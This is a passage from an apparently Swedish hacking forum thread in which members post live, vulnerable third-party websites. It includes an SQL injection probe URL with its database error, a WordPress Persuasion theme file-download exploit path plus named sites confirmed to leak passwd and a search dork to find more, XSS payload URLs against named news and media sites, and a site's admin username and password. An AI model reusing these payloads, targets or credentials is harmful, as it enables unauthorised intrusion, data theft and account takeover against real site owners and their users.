2013-12-22, 01:49
  #3949
Medlem
LadyGanjas avatar
http://www.muevete.ch/person.php?id=15%27

Citat:
Warning [2] mysql_fetch_assoc() expects parameter 1 to be resource, boolean given
in /home/muevete/public_html/person.php on line 10

Orkar inte mer x) går för segt skannar via irc botar ...
Citera
2013-12-24, 10:32
  #3950
Medlem
key33s avatar
Jag tittade in på http://www.exploit-db.com/ när jag drack kaffe och hittade en ny exploit till ett wordpress tema som heter Persuasion.

"Arbitrary File Download and File Deletion Exploit"

Som vanligt när wp drabbas av en säkerhetsbrist(även om det bara är ett tema) så blir många drabbade då dom har väldigt många användare.

Exploit:

Några sidor som är sårbara(testade att läsa passwd):
Kod:
http://ligula[dot]se/wp-content/themes/persuasion/lib/scripts/dl-skin.php
http://lagare[dot]nu/wp-content/themes/persuasion/lib/scripts/dl-skin.php

Dork:
Kod:
inurl:/themes/persuasion/


G0d Ju1
Citera
2013-12-25, 12:58
  #3951
Medlem
LadyGanjas avatar
http://fifteenminutesoffame.me/ xss i sidan, funkar med <script>alert("god jul");</script> osv
Förklarat på http://code.devote.se/blogs/27795772/xss-found-on-httpfifteenminutesoffameme.htm
Citera
2013-12-27, 00:59
  #3952
Medlem
droles avatar
Satt och rensade lite filer och hittade några sidor från något experiment för nått år sedan.
Inget jätteintressant men någon kanske finner det kul.

(alla parter är kontaktade och försökt komma i kontakt med)

http://expressen.se/sok/?q="; alert(1); //
http://www.svtplay.se/sok?q=test"; alert(1); //
http://oppetarkiv.se/sok/?q=test"; alert(1); //
http://www.howtogeek.com/search/?q=x" <script>alert(1)</script>
Citera
2013-12-27, 01:03
  #3953
Medlem
.Chloes avatar
Citat:
Ursprungligen postat av key33
Jag tittade in på http://www.exploit-db.com/ när jag drack kaffe och hittade en ny exploit till ett wordpress tema som heter Persuasion.
Kaffe är gott.

Persuasion är ju det temat som offensive-security använder. Tydligen så har OS startat ett bug bounty program bara för det: http://www.offensive-security.com/offsec/bug-bounty-program-insights/

Kudos
Citera
2013-12-27, 13:31
  #3954
Medlem
snapchat har problem med säkerhet, nu kan man se personer som har valt att vara anonyma deras mail och allt. en grupp hackers har publicerat en guide. dock fattar jag inte hur det går till.


http://gibsonsec.org/snapchat/fulldisclosure/
Citera
2013-12-27, 15:51
  #3955
Medlem
SpecialEditions avatar
Citat:
Ursprungligen postat av jagluraalla19
snapchat har problem med säkerhet, nu kan man se personer som har valt att vara anonyma deras mail och allt. en grupp hackers har publicerat en guide. dock fattar jag inte hur det går till. http://gibsonsec.org/snapchat/fulldisclosure/
Men du som har hållit på i flera månader borde väl förstå det där utan problem
Citera
2013-12-27, 16:08
  #3956
Medlem
ellelols avatar
Citat:
Ursprungligen postat av jagluraalla19
snapchat har problem med säkerhet, nu kan man se personer som har valt att vara anonyma deras mail och allt. en grupp hackers har publicerat en guide. dock fattar jag inte hur det går till.


http://gibsonsec.org/snapchat/fulldisclosure/
Verkar som man drar nytta av deras backend rest API. Känns ganska förvånande hur dem inte har fixat detta för länge sen..
Citera
2013-12-27, 16:46
  #3957
Medlem
Citat:
Ursprungligen postat av SpecialEdition
Men du som har hållit på i flera månader borde väl förstå det där utan problem


just det här är nytt!
Citera
2013-12-27, 16:58
  #3958
Medlem
.Chloes avatar
Citat:
Ursprungligen postat av jagluraalla19
just det här är nytt!
Det är ett PoC(Proof Of Concept) och allting är ingen direkt färdig exploit per sé. Vad gibsonsec försöker säga egentligen är att Snapchat's API lider utav integritetsläckor. Inte bara det, utan de visar även att det finns flertalet exploit att bygga(DoS bland annat). Det viktigaste är att man kan få reda på en användares telefonnummer.

Alla PoC är skrivna i Python och de står längst upp i PoC'en hur man använder skripten.
Citera
2014-01-09, 15:47
  #3959
Medlem
Provocerats avatar
Tänkte tipsa om den svenska sajten 402m.se.
Följande länk är sårbar för injektioner. Enkelt att komma åt databasen. Webmaster-kontot har FYI användarnamnet "Webmaster" och lösenord "test".

http://www.402m.se/senaste/sida.php?id=77
Citera
2014-01-12, 03:46
  #3960
Medlem
J4ckdanielss avatar
Citat:
Ursprungligen postat av Provocerat
Tänkte tipsa om den svenska sajten 402m.se.
Följande länk är sårbar för injektioner. Enkelt att komma åt databasen. Webmaster-kontot har FYI användarnamnet "Webmaster" och lösenord "test".

http://www.402m.se/senaste/sida.php?id=77

Gammalt forum. Det är skumt att det fortfarande används...
Annars att förvara lösenord i klartext är ju kanske inte den bästa lösningen heller

Slangen slang är ett av kontona :P
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in